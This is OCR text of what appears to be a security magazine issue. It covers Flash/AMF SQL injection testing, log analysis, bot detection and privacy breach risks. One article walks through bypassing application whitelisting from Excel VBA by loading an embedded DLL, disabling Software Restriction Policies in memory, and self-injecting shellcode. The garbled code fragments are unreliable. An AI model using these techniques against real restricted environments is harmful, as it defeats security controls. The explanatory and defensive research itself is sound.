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Figure 12 - Adding quote in the request. 
Along with the stack, here is the response: 



AMF Message 
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lEl-ti Body 
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com , mysql . jdbc . exceptions , jdbc4, JW3till5Wfl5ff3iHj3!^Biffil WBb ve • 

tax; check the manual that corresponds to your MySQL server version fior I 

ear 'admin" at line 1 

at sun , reflect, Nati veConstrucfjorAccessorlmpI . newInstanceO I 
at sun . reflect. Nafj veConstructorAccessorlrnpl . newlnstance (f* 

orlmpl.java: 39) 

at sun , reflect, DelegatingConstructorAccessorlmpI , newlnstan 

orAccessorlrnpl . java : 27) 

at java , lang , reflect, Constructor , newlnstance fConstructor , ja 
at com , mysql , jdbc , UtJl , handleNewInstance (U til Java : 409) 
at com , mysql , jdbc , UtJl , getlnstance (Util Java : 334) 
at com, mysql, jdbc, SQLError,createSQLExcepfjon[SQLError,ja 
at com, mysql, jdbc, My sqllO.checkErrorPacketflviysqllO. java: 3 
at com , mysql . jdbc . My sqllO . checkErrorPacket[MysqlIO . java : 3 
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Here, the stack trace shows a possible SQL 
injection. An attacker can leverage this par- 
ticular point and exploit the server side com- 
ponents from here using the AMF stream. 

Conclusion and prospects 

In this paper, we have focused on the security 
analysis of Flash components. The need for 
security analysis has been explained in the 
context of the current information era (Web 
2.0). An attempt to see a small set of vulner- 
abilities has been made, along with trying to 
apply the discussed approach in tackling it. A 
second approach of protocol analysis has also 
been presented. 

It is possible to extend the same approaches 
to look out for other security loopholes such 
as: 

• Assumption of clients' behavior - for exam- 
ple, expecting the client to enter only plain text 
as required in a textfield and hence provide no 



validation is too simplistic and has a major 
loophole wherein the client may inject execu- 
table JavaScript code in the same textfield. 

• Disclosure of business logic and secrets on 
the client side, i.e. the username-password 
authentication logic may have been deployed 
as a client side ActionScript in the .swf file it- 
self. In such a case, a simple decompiler like 
SWFScan could be used to reverse engineer 
the .swf file and this, in turn, would give away 
the ActionScript which has cleartext 
username-password combinations. 

Such avenues for the use of reverse engineer- 
ing Flash based Rich Internet Applications are 
many and the idea of this paper is to open the 
eyes of the readers to reverse engineering 
and protocol analysis based Flash security 
with enough examples and tools after which 
the application of this approach may be con- 
sidered by individuals and modified to suit 
their own scenario. 
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What is a log? Without getting too philosophical, a log is a record of some 
activity occurring at or observed by an information system or application. 
Sometimes a collection of such log messages will also be called a log or a log 
file. Given this definition, the log data is used to analyze activities occurring 
on information systems - whether such activity analysis is for assuring secu- 
rity, maintaining operations or proving regulatory compliance. 



Logs are under-appreciated in many - if not 
most - organizations. Often, logs are com- 
pletely ignored and only noticed when disk 
space runs low. At that point they are usually 
deleted without review. And in some cases, 
some of the messages in the logs might have 
indicated that the disk was full and why, which 
means logs can be ironic as well. 

Logs can be an extremely useful source of 
information for security management. But, 
getting that information takes both time and 
work. At first glance, it can seem a daunting 
task - the sheer volume of data, along with its 
diversity and often subjective nature, can be 
scary. 

Despite such challenges, logging is a primary 
means of IT accountability and thus its impor- 
tance cannot be overstated. That is exactly 



why logging is a perfect compliance technol- 
ogy, mandated by many regulations and laws. 
Also, from the forensics point of view, logging 
makes proving that something has happened 
or has not happened a lot easier than digging 
through disk images. 

Dealing with logs 

The author is sometimes asked to define what 
"log management" is. It is not some secret 
technology you can buy for many thousands 
of dollars; it simply means dealing with logs. 
As mentioned before, some organization 
"deal" with logs by ignoring and then deleting 
them, other deploy advanced systems and 
proficient personnel to perform near real-time 
analysis of log data. Due to confusing and of- 
ten esoteric log messages, simply reading log 
messages turns out to be not entirely useful. 
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Logs need to be analyzed to come to life and 
share their insights (see "Top 11 Reasons to 
Analyze Your Logs" - bit.ly/b2kMrE). 

At the same time, most of the principles and 
methods log analysis tools use hark back to 
the 1980s (yes, really!). Specifically, using 
regular expressions and simple pattern 
matching to insert logs into databases and 
then report on them has been known for 
nearly 30 years. Is this truly the state of the 
art of log analysis? Many security profession- 
als believe that we are stuck with such an- 
cient log analysis methods and that no inno- 
vation has occurred in the field. In this article, 
I will try to analyze what we are doing now 
about logs and what we can do in the future to 
solve the logging problem once and for all. 

What analysis? 

First, are logs really data? If you've come 
across such gems as 



Aug 11 09:11:19 xx null pif ? exit! 0 

and 

userenv [error] 1040 XYZI-CORP\vsupx 
No description available 

you will be tempted to consider logs to be a 
form of broken human language, not com- 
puter data. 

After all, most computers would prefer some- 
thing more structured and less ambiguous! 
The continuous existence of such pathetic log 
messages simply reminds us of the fact that 
most log analysis is still performed by not 
even using the 1980s tools, but by using a 
tool that has an even older past - the human 
brain. 

Are logs neat computer data or subjective 
human text (sometimes also called unstruc- 
tured data)? Before we delve into this, let's try 
to see the defining characteristic of these two: 



Logs as Data 


Logs as Text 


Has structure: fields, values 


Lacks structure 


Can be inserted into database 


Need preprocessing 


Can be summarized and counted 


Need to be "interpreted" 


Mostly unambiguous 


Highly ambiguous, subjective 


Intended for automated systems 


Intended for humans 


Example: XML 


Example: English 



To add insult to injury, logs often present the 
worst kind of text - not just ambiguous but 
subjective, not just unstructured but jumbled. 
In many cases, this simply means that analy- 
sis becomes completely impossible. 

While many types of log data, such as firewall 
logs, intrusion detection logs, or database 
audit trails clearly belong in the data realm 
due to their structured nature, the same 
cannot be said about some other log types. 

Unix Syslog presents a classic example: even 
for something as simple as a time stamp, 
there are more than 50 ways to express it. 
The rest of the message fares much worse - 
essentially, it will contain whatever the de- 
ranged mind of a super-busy developer will 



dump there. Application logs and especially 
logs from vertical and niche applications fare 
even worse than that. They contain hardly any 
information, resulting in gems shown above. 

With such a dire situation on our hands, what 
are our choices for log management and log 
analysis? 

The BEST way to deal with logs 

Are we on a fool's errand here? Is there such 
a thing as the best way for dealing with logs? 
Well, it has to be said that many organizations 
today deal with logs by ignoring them. While 
such behavior can be attributed to sheer stu- 
pidity, we can also consider it as a lack of 
education. 
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Having multiple competing priorities for IT and 
IT security managers' time and resources 
does not help the situation either. By the way 
ignoring logs covers also the not having logs 
and the turning them off scenario. 

Storing logs is another common choice for log 
management. For many organizations that did 
not have logging or have been ignoring logs 
for years, this is a huge step forward. Now, at 
least, they can sleep better knowing that if 
something bad happens they can always go 
back and look up the activity records. How- 
ever, this approach is only marginally better 
than the previous one. 

Attempts to start reading the stored logs peri- 
odically often result in failure. The volume and 
the diversity of log data - as well as its subjec- 
tive nature - kill most manual log review pro- 
jects. And we are not talking about gigabytes 
here - more than a few organizations have 
learned what a petabyte really is after engi- 
neering their log collection efforts. Overall, it is 
hard to gain awareness of the environment - 
whether for security or troubleshooting - sim- 
ply by reading raw log data. 

We must try to filter the logs in order to detect 
only the "bad stuff". This approach certainly 
works in the field and many commercial and 
open source log analysis tools implement it. 
What makes it of limited value is that in many 
cases the thing that we are looking for is not 
present in individual log messages, but can 
only be discovered from groups of messages 
correlated together. For example, while a 
connection to port 80 allowed by a firewall is 
not malicious by itself, a particular pattern of 
connectivity to port 80 of multiple machines 
might be. Also, some log messages cannot be 
qualified as "bad" but they are still interesting 
to look at as precursors for future "badness". 

For highly structured logs such as firewall 
connection logging, the answer is simple: col- 
lect the logs, tokenize them (the not entirely 
accurate term "parse" has become standard 
usage) and then use your database to filter 
and summarize as needed. Producing reports 
such as "top e-mail users", "most frequent 
ports used" and even "least frequent attach- 
ment types" has become the favorite pastime 
of firewall administrators and security manag- 
ers. 



However, such log sources have been shrink- 
ing in importance, overshadowed by less 
structured server and application logs. I'm 
speaking from experience when I say that di- 
recting a large percentage of syslog mes- 
sages from multiple Linux and Unix operating 
systems into a database is a laborious task - 
and one that needs to be constantly 
performed. 

The tools require hand-written regular expres- 
sions in order to put such logs into a database 
while extracting useful information (user- 
names, source IP addresses, even time 
stamps) from them. 

Of course, one can avoid parsing altogether, 
as well as avoid storing logs in a database; 
simply indexing logs with extremely limited 
field extraction (such as timestamp and the 
machine that produced the log) is quite popu- 
lar as well. However, many data presentation 
and data analysis techniques become 
impossible as a result. 

This situation can be visualized using the dia- 
gram on the following page - typically, we can 
get useful information out of logs after spend- 
ing a lot of effort (top right corner) or render 
them and focus on getting a small amount of 
value out of log data by indexing it only 
(bottom left corner). 

The diagram also gives us useful directions 
for future. The red arrows indicate two possi- 
ble directions for improving log analysis - one 
can either make parsing data easier or try to 
make indexed data more useful. However, 
there are also alternative approaches. 

We can wait for logs to become standardized 
and more structured. Efforts such as Common 
Event Expression (CEE), a MITRE run stan- 
dard (cee.mitre.org), will eventually make logs 
more predictable and easier to analyze and 
understand. However, given the history of at- 
tempts to standardize logs, we might have to 
wait for at least a few years. 

Also, we can try using the emerging field of 
text mining for converting logs into data. But, 
even though using tools from an unproven 
field presents an interesting research chal- 
lenge, it gives small hope for "instant 
gratification" to log analysts. 
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Direction: 
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Direction: 

make indexed data 
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DATA 
raw data 



indexed log data 
EASY to GET 



parsed log data 
HARD to GET 



Despite that, some open source tools such as 
slct (/bit.ly/b8fl_zW) and log hound 
(bit.ly/dcKzy8) use simple text mining algo- 
rithms such as text clustering in order to 
tackle the log beast. 

To make it even better, one can combine text 
mining methods such as text clustering, profil- 
ing of text streams, Bayesian mining and even 
natural language processing (the other NLP) 
with domain-specific keyword analysis. For 
example, by looking for keywords such as 
chang*, modif*, add*, delete*, drop, remove*, 
creat*, etc, over time across multiple system 
logs, one can profile how system changes are 
performed during normal business use. Such 
profiling will afterward allow us to detect unau- 
thorized and anomalous changes recorded in 
the logs. 

Finally, there are semi-automated or "machine 
assisted" approaches for writing those regular 
expressions. They reduce the skill require- 
ment for log analysis and are successfully 
used in the field by commercial vendors to 
parse simple log formats. 



While some people mistakenly consider log 
analysis and log management to be stagnant 
fields, it is true that many unresolved 
challenges remain. 

Apart from improving the analysis of log data, 
we have also the opportunity to improve the 
quality of logs, as well as instructing applica- 
tion developers in good logging practices. 
One thing is clear, though: we'll be dealing 
with greater quantities and an even wider ar- 
ray of different types of log data in the future. 
Consequently, the answers to the questions of 
what to do with them and what are they trying 
to tell us will have to be provided. 

The ideal log analysis application of the future 
should be able to analyze all kinds of logs - 
those familiar and the unfamiliar, from stan- 
dard and custom log sources - and tell the 
users what they need to know about their en- 
vironment. Such an application doesn't yet 
exist, but there are many promising avenues 
that need to be explored. 



Dr. Anton Chuvakin (www.chuvakin.org) is a recognized security expert in the field of log management and PCI 
DSS compliance. He is the author of several books and has published dozens of papers on log management, 
correlation, data analysis, PCI DSS, security management (www.info-secure.org). His blog 
(www.securitywarrior.org) is one of the most popular in the industry. 



Currently, he is developing his security consulting practice (www.securitywarriorconsulting.com), focusing on 
logging and PCI DSS compliance for security vendors and Fortune 500 organizations. He was formerly a Di- 
rector of PCI Compliance Solutions at Qualys, and has worked at LogLogic as a Chief Logging Evangelist, 
tasked with educating the world about the importance of logging for security, compliance and operations. 
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y and hacker conferenc 
providing two days of an interesting atmosphere for open 
discussions of critical infosec issues, privacy, information 
technology and its cultural/technical implications on society. 



Organized in Brussels, BruCON offers a high quality line up of 
speakers, security challenges and interesting workshops. 

More information available at http://www.brucon.org 
Sponsors Mediapartners 



Want to become a partner or sponsor of a great event? 
Contact us via http://www.brucon.org 



Launch arbitrary code from Excel 
in a restricted environment 




The exercises presented here are all variations on the same theme: the launch 
of arbitrary code from Excel in a restricted environment. 



A Least-Privileged User Account (i.e. no ad- 
ministrative rights) on Windows and applica- 
tion whitelisting software (like Software Re- 
striction Policies, AppLocker, etc.) are the 
main components of the restricted environ- 
ment. Excel (or any other application support- 
ing VBA) is installed in the environment with 
macros enabled. The objective of the envi- 
ronment is to restrict the code execution op- 
tions available to the user. Unapproved code 
is not allowed to run. 

A typical example of such a restricted envi- 
ronment is a corporate Terminal Server ses- 
sion. The goal of the exercises is to explore 
Windows features that can be leveraged to 
bypass the restrictions and run arbitrary code. 
Vulnerability exploitation is excluded from 
these exercises. 

Loading a DLL 

Running arbitrary code is often executed by 
creating a new process, but creating new 



processes is strictly controlled in a restricted 
environment. Loading a DLL inside an existing 
process is another way to run arbitrary code, 
but doesn't require process creation. 

VBA - the VBScript programming language 
used in Excel - supports calling Win32 API 
functions. Loading a DLL inside Excel from a 
macro is done with LoadLibrary. To execute 
arbitrary code, the DLL is embedded inside 
the Excel VBA macro using BASE64 strings, 
as shown on the following page. 

The VBA macros of the first exercise do the 
following: 

1 . Extract the BASE64 encoded DLL from the 
strings 

2. Write the DLL to a temporary file 

3. Load the DLL inside the Excel process 

Application whitelisting software that is not 
configured to whitelist DLLs (e.g. only EXEs 
are whitelisted) will not prevent the DLL from 
loading and executing. 
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I'rivatc function PliLtontcnt 1 \ > Ac String 

Pim BDLLContcnt String 



sPLLContent - 

.■stLLConteTit - sDHContent +- »GF5J*VD1)-11-11-11-11::H-11::F1JL7FFTV li /dCr./.-JCj i A 

atLLConteTit - jsDLLConteTit +- "DglTi 3c(3LOTBqAat9CFdQ£iF;s A A ACFuHQE i 6rir54tB<jFCL 

sELLCdiitent - sLLLCoiiteiit "h<y/BqAf 9ir>FboIuAAArKAdAiIivig3I>i!wLi:4itj ::OiraLE: 

sDLLConteiiE - sDLLCQnteilt + "3lOUELhCAvtaJll52 cHjAOUOtgiEytl.uHSCLTCuVaKOEC'r 

sDLLContent, - sDLLCantent + "g-3 OHAHUb lOUOWo A 100 1 i lie-/ 9 JOiOtl I j.0y 'c7 9Hl H«sJ 

aDLLContenc - sDLLContent + "ePHEH£H O nH :i }] :iH tHiV ±.+ ^r'7ESLPESL3 A3 JT1 '7L 

sDLLContent ■ sDLLContent +■ "ELElVlJiJA'JJPfvLTevI'ViSLJTevLVPSLACj+JSATSTIwPJ 

sDLLContent » sDLLContent + "CfB£qAEA A A, L lX01iotF7 ItNS AH IDFGLVC/lLC , nY 0 1 1F+ 1 

sPLLContent = sPLLContent + TOuEaqPo AE AA A ItH7 ItPEFKLPe vLTIADS AxP r iu no I 

sPLLContent = sPLLContent + "C;iLSAE/0TPEPItV7ItF+IlCCO}:E//V/ l+VdviSEHVYvs 

sPLLContent - sPLLContent + "AAAflciriAaAAAPHPeQCAAAAKOKoEAAAAHdl^EAAAAPHP: 



Bypassing SRP 

Software Restriction Policies supports white- 
listing DLLs too, preventing an arbitrary DLL 
from loading. Mark Russinovich developed a 
tool to disable SRP as a LUA user (GPDis- 
able). A design flaw of SRP is that it runs in- 



side the user's own processes (it's imple- 
mented in advapi32.dll). Changing the value 
of a couple of variables used by advapi.dll di- 
rectly in memory disables SRP, allowing arbi- 
trary DLLs to load. This too can be done from 
VBA macros: 



ftlvste Declare function Vr iteProccsrXcniory Lib **KERNEL32 H 
jbiyVa! hProcess Ac Long, By Vol ljilio.se Address As Any, 
ipButfe-r la Any, ByVal nSize As Lang, 
IpNwvtocTOf Bytestlritten As Long] A? Long 

P r-.vflt.<- TV.-Lflrr frnirtirai LnadLibmry :. "KERNELS 2" A] inn "LflwAt 
Private Declare function FreeLibrary Lib "KERNEL32" (ByVal tiLiht 



Sub LoItO 

Dim hLibrary 
[i _ r:i iLtFj.lt 



atrFile " TempFllenaine 

DiiMPFlle 8t.rFl.le 



1 version S. 1. 2 COD. 5512 
iPjesuit = wr ltaProcassHeBorv [- i , iY~/~i279fwa, (H41, 1, 0) ' 
iPjesuit = iOr lteProcessHewory [- 1 , \Y.~~14 f 42C , i:-:c r 1, D) ^ 
ABi - ary = Loaami r a r y latrj iie | 



freeLilorary JiLiJarary 
DeleteFile strrne 



The VBA macros of the second exercise do 
the following: 

1. Disable SRP 

2. Extract the BASE64 encoded DLL from the 
strings 

3. Write the DLL to a temporary file 

4. Load the DLL inside the Excel process. 

Injecting shellcode 

When all types of executables (EXE, DLL, 
CPL, etc.) are whitelisted, injecting shellcode 
is the next option to explore. Shellcode is 
location-independent code, often written in an 
assembler, and is then injected and executed 
inside the memory space of an existing proc- 



ess. As shellcode is not your average applica- 
tion (it doesn't use executable files), most ap- 
plication whitelisting software doesn't block 
this. But they often detect and block this clas- 
sic attempt to execute shellcode: shellcode is 
injected by process A into process B and exe- 
cuted inside process B by creating a remote 
thread. 

In this exercise however, shellcode is injected 
inside the Excel process by the Excel process 
itself, and no remote thread is created. I've yet 
to find a Host Intrusion Prevention System 
that detects this case. 
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Oft 1011 Ext) lit it 

Private Herlare Function VlrtiMUilor Lib "KERKELJ2* (ByVel ljilddrejj As Ldiki, BtVsI 
Private Declare Function VriieProf-eseHeirary Lib "KERHEL32* {ByVal hPcoeesa As Loner, 
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Private Sub ExecuteShe 1 ICode I ) 

Plw lnlfewor? As Long 

Die aBneilCQde As String 

bias i Result Jt3 Lcnrj 
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The VBA macros of the third exercise do the 
following: 

1 . Extract the BASE64 encoded shellcode 
from the strings 

2. Write the shellcode to the Excel process 
memory 

3. Execute the shellcode by creating a new 
thread 

Loading a DLL from memory 

Although shellcode can be considered as ar- 
bitrary code, it's hard to write and it's ex- 
tremely rare that complete applications are 
written in shellcode. Compiling arbitrary code 



into a DLL is much easier compared to writing 
it in shellcode. 

In this last exercise, I use special shellcode 
that I have developed to load a DLL into proc- 
ess memory directly from memory. It doesn't 
use LoadLibrary, but performs all the actions 
of LoadLibrary to load a DLL, except it does 
this from memory and not from disk. This is 
effectively a combination of previous exer- 
cises: loading a DLL and executing shellcode. 

In this exercise, a DLL version of cmd.exe is 
used - I compiled this DLL from the ReactOS 
source code for cmd.exe: 
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The result is a command line interpreter run- 
ning inside the Excel process. No new proc- 
ess is created, no DLL is written to disk. 

The VBA macros of the fourth exercise do the 
following: 

1 . Extract the BASE64 encoded shellcode 
from the strings 

2. Write the shellcode to the Excel process 
memory 

3. Execute the shellcode by creating a new 
thread. 

The shellcode of the fourth exercise does the 
following: 

1 . Loads the DLL embedded inside the shell- 
code into memory 

2. Jumps to the DLL entry point (DLLmain). 



Conclusion 

These exercises show clearly that it is possi- 
ble to execute arbitrary code in a restricted 
environment. Naturally this arbitrary code 
runs under the LUA user and has no adminis- 
trative rights. To obtain administrative rights, it 
has to exploit a privilege escalation vulnerabil- 
ity (like KiTrapOD) or find and exploit a mis- 
configuration of the restricted environment. 

Is this an issue for the restricted environments 
you're managing? Probably not, as the main 
goal of restricted corporate environments is to 
limit helpdesk support costs caused by inap- 
propriate changes to the environment. But if 
you provide a restricted environment to the 
Internet population, you must be aware that it 
will be abused. 



Didier Stevens (CISSP, GSSP-C, MCSD .NET, MCSE/Security, RHCT, OSWP) is an IT Security Consultant 
currently working at a large Belgian financial corporation. He is employed by Contraste Europe NV, an IT Con- 
sulting Services company (www.contraste.com). You can find his open source security tools on his IT security 
related blog at blog.DidierStevens.com. 
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security spotlight 



Here are some of the Twitter feeds we follow closely and can recommend to anyone interested in 
learning more about security as well as engaging in interesting conversations on the subject. 

If you want to suggest an account to be added to this list, send a message to ©helpnetsecurity 
on Twitter. Our favorites for this issue are: 

©jaysonstreet 

Jayson E. Street - Chief Infosec Officer at Stratagem 1 Solutions. 
http://twitter.com/jaysonstreet 



©stacythayer 

Stacy Thayer - Founder and Executive Director of SOURCE Conference. 

http://twitter.com/stacythayer 



@ Beaker 

Christofer Hoff - Director, Cloud & Virtualization Solutions at Cisco. 

http://twitter.com/Beaker 



©human hacker 

Chris Hadnagy - Developer of the social engineering framework. 
http://twitter.com/humanhacker 



@hypatiadotca 

Leigh Honeywell - NSSLabs analyst and security consultant. 
http://twitter.com/hypatiadotca 
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Affordable Strong Authentication for your Enterprise 

Entrust IdentityGuard 



Versatile. Affordable. Easy to use. Entrusts strong authentication solution offers the 
widest range of authenticators on the market today — all from a single platform. 
Affordable enough to deploy across your entire enterprise, yet flexible enough for 
your unique requirements. Trusted by over 2000 organizations spanning 60 countries. 

For a one-on-one demonstration of the benefits of our strong authentication solutions, 
visit Entrust today, 

www.entrust.com • 1-888-690-2424 • entrust@entrust.com 
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Automated robotic malware. We in the industry call them "bots" and they are 
an absolute blight to the online experience. Bots perpetrate fraud, steal con- 
tent, destroy data, generate spam and generally wreak havoc on the sites they 
attack. IT professionals are left to pick up the pieces following these attacks, 
often with little success and great frustration. It's time that IT put the burden 
on the bot, forcing them to work harder to infiltrate websites and breach secu- 
rity. As it stands, bots are ahead in the race, always being chased by IT pro- 
fessionals after the damage is already done. New ways of combating bots that 
are available today are perfectly capable of shifting the burden to the bot. 



Hitting the BOT-tom line 

Fraudulent activity conducted by bots is sig- 
nificantly impacting many organizations. So- 
cial networking sites, popular blogs, career 
sites, search engines, webmail providers and 
others with dynamic functionality are all 
targets. 

Bots can be extremely sophisticated, overtak- 
ing thousands of computers to generate a few 
fraudulent activities per machine and complet- 



ing their mission undetected after creating 
tens of thousands of fraudulent transactions 
over a span of 24 or 48 hours. The sleekest 
bots go undetected, the timing of their attack 
never even realized, but the aftermath evident 
in the volume of fraudulent accounts created, 
spam delivered, and content scraped. 

All of the clean-up efforts divert money and 
resources from core business activities, caus- 
ing devastating financial losses to these 
companies. 
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Wrecking the online experience 

Not only do bots frustrate website owners and 
the IT professionals that manage them, but 
they also disrupt the online experience of le- 
gitimate website visitors. CAPTCHAs are by 
far the most prevalent technology used on 
websites today to prevent bots from entering. 
In addition to being increasingly ineffective at 
blocking bots, CAPTCHAs also frustrate 
legitimate users to the site. 

An estimated 3 to 10% of human visitors pre- 
sented with a CAPTCHA will simply abandon 
the transaction. With no interest in completing 
an additional registration step of deciphering 
distorted letter combinations, some customers 
simply refuse to suffer through this security 
screening. Website owners, in turn, suffer 
from the loss of legitimate customers, traffic, 
and revenue. 

Other systems like keylogging have largely 
been abandoned due to privacy concerns. 
Reputation systems log activities by originat- 
ing IP address, flag specific hardware as dan- 
gerous, and subsequently block those IP ad- 
dresses from interacting with the site. This 
method is effective for blocking bots, but un- 
fortunately shuts out legitimate users as well. 
With more than 150 million computers in- 
fected with automated robotic malware, the 
hardware generating the harmful bots is the 
very same hardware used by customers. 
Blocking the bots means blocking customers 
too. 

Burdening internal resources 

Zero-day vulnerability is a term used to de- 
scribe the situation that arises when a brand- 
new, never-before-seen vulnerability is dis- 
covered. The issue is new and it is free to 
cause damage until security professionals 
have an opportunity to respond with a 
counteractive measure. 

CAPTCHA is an aging technology that has not 
kept pace with bots. Most web property own- 
ers are always reacting to bots and the dam- 
age they cause. There are three widely used 
approaches for dealing with automated proc- 
esses - all of them inflicting pain on someone 
other than the bot. 



The chaser 

The chaser is the unfortunate IT professional 
assigned to web logging - evaluating in real- 
time the IP addresses visiting the site - and 
trying to determine which visitors are auto- 
mated versus human. 

By the time this unfortunate soul is able to 
identify suspicious, bot-like behavior, track the 
IP address and do something about it, the bot 
is already gone. The chaser is largely ineffec- 
tive and extremely frustrated. 

The cleaner 

Some customer-centric website owners re- 
fuse to use CAPTHCAs, no matter the suffer- 
ing caused by bots. These companies assign 
resources specifically to "undo" the damage 
done by the bots. Whether that means delet- 
ing fraudulent registrations, erasing spam-like 
posts from the website's blog, or investigating 
the placement of stolen content, internal re- 
sources "clean up" the damage done by bots. 

This generates significant expense to the 
company and is a completely reactive ap- 
proach. As a side note: due to the ineffective- 
ness of CAPTCHAs, even sites that employ 
them must conduct these "cleaning" activities. 

The martyr 

The martyr is willing to defile its own website 
in an effort to block bots. Usually a CAPTHCA 
user, the martyr bears the costs of brand 
damage and lost customers on the front-end. 
Consider this example: a website that re- 
ceives 100 registrations per day, loses 10 reg- 
istrations because customers are unwilling to 
decipher a CAPTCHA. 

The company knows that their cost is $7 per 
lead. That CAPTCHA just cost the company 
$70 in a single day - without mentioning the 
money that must be spent after the fact due to 
the increasing percentage of bots that is able 
to overcome CATPCHAs and commit fraud on 
the site. 

This is a case of letting the bots in and keep- 
ing the humans out. 
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Shifting the burden: Putting bots on the 
defensive 

The problem with CAPTCHAs, reputation sys- 
tems, and other CAPTCHA-replacement solu- 
tions is that they fail to challenge the bots. 

Common to all of these solutions is the fact 
that the burden is placed on the human user. 
Reputation systems conduct a historic analy- 
sis, blocking bots only once they have 
continually committed fraud on the site. 

CAPTCHA systems burden human visitors, 
forcing them to prove they are human to gain 
access. CAPTCHA-replacement options such 
as simple math problems and queries also 
place demands on legitimate users. None of 
these solutions challenges bots. A new 
approach is required. 

The newest technologies place the burden on 
the bots who have to prove they are human. 
Rather than blocking everyone and whitelist- 
ing humans, new technologies are invisible to 
users and effectively detect and block bots. 

Behavior profile 

Bots behave in ways that are easily distin- 
guishable from humans. So why do bot block- 
ing technologies fail to analyze a complete 
profile of bot behavior? 

Timing algorithms and keylogging technolo- 
gies come the closest, monitoring natural 
pauses and variable rate of use of the key- 
board and mouse. However, these systems 
are invasive and fail to analyze multiple vari- 
ables that distinguish human and automated 
behavior. 

Technologies that challenge bots with analysis 
of a complete profile of behaviors are much 
more likely to successfully identify them. With 
technology advancements, bots can be easily 
programmed to mimic the particular behavior 
testing in a single-variable analysis. However, 
if bots were to be evaluated on a series of be- 



haviors, it would create a much more chal- 
lenging environment for botnet operators. 

Random variation 

Much like students who know the teacher 
uses the same test year after year, bots have 
a knack for "working the system." The older 
students pass down the previous years' test 
and new students simply memorize the an- 
swers in order to ace the test. Botnet opera- 
tors can easily "learn" a test that is presented 
over and over in exactly the same order. 

Random variation in the order of testing ques- 
tions can make bot-blocking technologies 
vastly more effective. Additional knowledge 
and effort is required, decreasing the bots' ef- 
fectiveness. 

Customer options 

Once a bot has been identified, the most ef- 
fective systems will allow web property own- 
ers to deal with them in a variety of ways. 
Some owners will prefer to block them out- 
right. Others may wish to pose an additional 
test for verification to make absolutely sure 
that the visitor is not human. It is also possible 
to redirect the bot to a database of false data, 
allowing the bot to continue operating as 
programmed, but with sample data. 

The botnet operator believes the bot is con- 
tinuing to work as instructed, while there's no 
impact from fraudulent activity. 

These simple criteria for combating bots chal- 
lenge botnets and their operators, putting bots 
on the defensive rather than letting them 
wreak havoc and disrupt the activity of human 
visitors, web site owners, and IT professionals 
alike. 

Given that this problem leads to an estimated 
151 billion spam messages a day, billions of 
dollars in wasted resources, and the lessen- 
ing of profitability of legitimate companies, 
isn't it time to try a new approach? 



David Crowder is CEO of Pramana (www.pramana.com), an Internet fraud protection company specializing in 
bot detection and elimination software. You can contact David at david@pramana.com. 
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Datab^ 

The expanding role of the IT security professional 

by Rick Karri 

You have a meeting with your IT Executive. You learn that you are now desig- 
nated as the company's "privacy officer," a newly created role with few pa- 
rameters and little direct budget or authority. Yet this position also comes with 
high expectations and responsibilities, and a laundry list of worries. You are 
now responsible for maintaining the privacy of your customers' and your pa- 
tients' personally identifiable information (Pll) and protected health informa- 
tion (PHI). You take a deep breath. If it makes you feel any better, you are not 
alone. 



We've noticed that the Chief Information Secu- 
rity Officer (CISO) or IT security function is in- 
creasingly taking responsibility to deal with 
risks, and associated management of data 
breach incidents. This creates an interde- 
pendent relationship for the CISO with the 
Chief Privacy Officer (CPO) and the privacy 
function. 

In many healthcare organizations, the IT secu- 
rity professional is thrust into the privacy role 



as companies begin to sort out their obliga- 
tions to the growing federal and state level pri- 
vacy legislation. Navigating through this maze 
can be both challenging and rewarding. 

Your success in your new role depends on 
how well you can identify and quantify your 
company's gaps in compliance to privacy 
regulations, actual risk of privacy breach inci- 
dents, and putting a plan in place and the 
necessary resources to mitigate these risks. 
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Technology is not a "silver bullet" for 
privacy compliance 

Hardly a day goes by without news of some 
type of data breach being reported. Data 
breach incidents are growing in frequency and 
severity while regulatory requirements for 
data privacy protection and incident notifica- 
tion are becoming more stringent. Although 
organizations entrusted with PI I and PHI are 
making investments in technologies such as 
encryption and data loss prevention (DLP), 
none of these are "silver bullets" that will 
eliminate data breach risks. Despite the focus 
on failure or lack of adequate security controls 
within organizations, a far more significant and 
common portion of these events are simply 
the result of staff's lack of awareness and/or 
compliance to internal security policies and lax 
practices to safeguard sensitive information. 

Risk factors and overlooked risks 

I will explore the various risk factors that corre- 
late to data breach incidents and associated 
organizational implications. I will also help 
identify areas on which information security 
and privacy professionals should focus their 
efforts in order to address the most prevalent, 
and often overlooked risks. 

Years of experience have taught us that the 
most common causes of data breach incidents 
resulting from unintentional failure of privacy 
and security practices/policies include: 

1 . Failure to terminate or modify both physical 
and/or network access levels when staff is 
transferred or terminated. 

2. Misdirected email messages or faxes to un- 
authorized recipient(s). 

3. Billing department mistakes when billing 
statements are sent to the wrong customers/ 
patients. 

4. Digital copy machines storing document 
images containing highly sensitive customer 
or patient data that is not encrypted or 
cleared. 

5. Improper disposal of paper records. 

6. Theft or loss of laptops, tapes, or portable 
devices. 

7. Physical security staff communicating sensi- 
tive information over an unsecured channel. 
While IT security technologies such as intru- 
sion detection, anti-virus, encryption and data 



loss prevention are all helpful and often nec- 
essary tools, these tools cannot prevent the 
vast majority of breach incidents that are daily 
occurrences across organizations including 
healthcare, financial, and government agen- 
cies, where most of breach incidents are oc- 
curring. The reason for this mismatch is that 
many of the technical controls assume mali- 
cious intent, yet most of the incidents are unin- 
tentional breaches of company security and 
privacy policies and practices. 

In the healthcare industry, for example, all of 
the above events may constitute data breach 
incidents with some of these events having 
severe internal and external implications for 
the organization. The American Recovery and 
Reinvestment Act of 2009 (ARRA), through its 
included Healthcare Information Technology 
for Economical and Clinical Health (HITECH) 
Act, amended HIPAA with requirements for 
healthcare organization to have documented 
policies and procedures, assigned responsi- 
bilities for privacy and security, ongoing train- 
ing for staff, a risk assessment for each inci- 
dent, and notification of victims as well as the 
department of Health and Human Services 
(HHS) based on the result of the risk assess- 
ment. These requirements became effective 
last year, on February 18, 2010. 

As required by section 13402(e)(4) of the HI- 
TECH Act, the Secretary must post a list of 
breaches of unsecured protected health in- 
formation that affects 500 or more individuals. 
The HHS started listing the breaches on its 
website in February 2010, then updated the 
list in April 2010. The data shows that more 
than 1 .2 million individuals were affected - 
based on information on 64 incidents. The way 
that HHS categorizes some incidents can at 
times make it difficult to tell the difference be- 
tween failures of technology as opposed to 
process. About 69% of the incidents are clas- 
sified as "Theft/Loss" and we can see with 
reasonable certainty that 30% of the incidents 
were process related. 

Risk assessments are effective for 
organizations 

Our experience shows that a significant por- 
tion of data breach incidents are managed by 
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our clients' IT organization where privacy and 
security are combined. For us, this often in- 
